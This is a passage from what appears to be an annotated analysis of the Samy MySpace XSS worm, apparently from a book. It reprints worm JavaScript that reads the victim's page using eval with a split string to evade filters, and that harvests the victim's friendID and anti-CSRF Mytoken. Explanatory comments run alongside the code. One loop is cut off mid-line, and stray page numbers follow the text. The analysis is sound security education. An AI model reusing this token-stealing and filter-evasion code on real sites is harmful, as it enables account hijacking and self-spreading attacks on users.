body.createTextRange();
htmlBody = textRange.htmlText;
} catch(e) {}
if (htmlBody) {
return htmlBody;
} else {
return eval('document.body.inne'+'rHTML');
}
}
// getCoreVictimData() sets global variables that holds the victim's
// friendID and Mytoken. Mytoken is particular important because it protects
// against CSRF. Of course if there is XSS, then CSRF protection is useless.
function getCoreVictimData(htmlBody) {
friendIdParameter = getParameterFromString(htmlBody, 'friendID');
myTokenParameter = getParameterFromString(htmlBody, 'Mytoken');
}
// Grab the query parameters from the current URL. A typical query parameter
// is "fuseaction=user.viewprofile&friendid=SOME_NUMBER&MyToken=SOME_GUID".
// This returns an Array with index "parameter" and value "value" of a
// "parameter=value" pair.
function getQueryParameters() {
63
var E = document.location.search;
var F = E.substring(1, E.length).split('&');
var queryParameterArray = new Array();
for(var O=0; O
var I = F[O].split('=');
queryParameterArray[I[0]] = I[1];
}
return queryParameterArray;
}
// This is one of many routines to grab the friendID from the body of the
// page.
function getVictimsFriendId() {
return subStringBetweenTwoStrings(getHtmlBody(), 'up_launchIC( ' +
singleQuote,singleQuote);
}
// I guess Samy never heard of the JavaScript function "void()".
Pages:
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152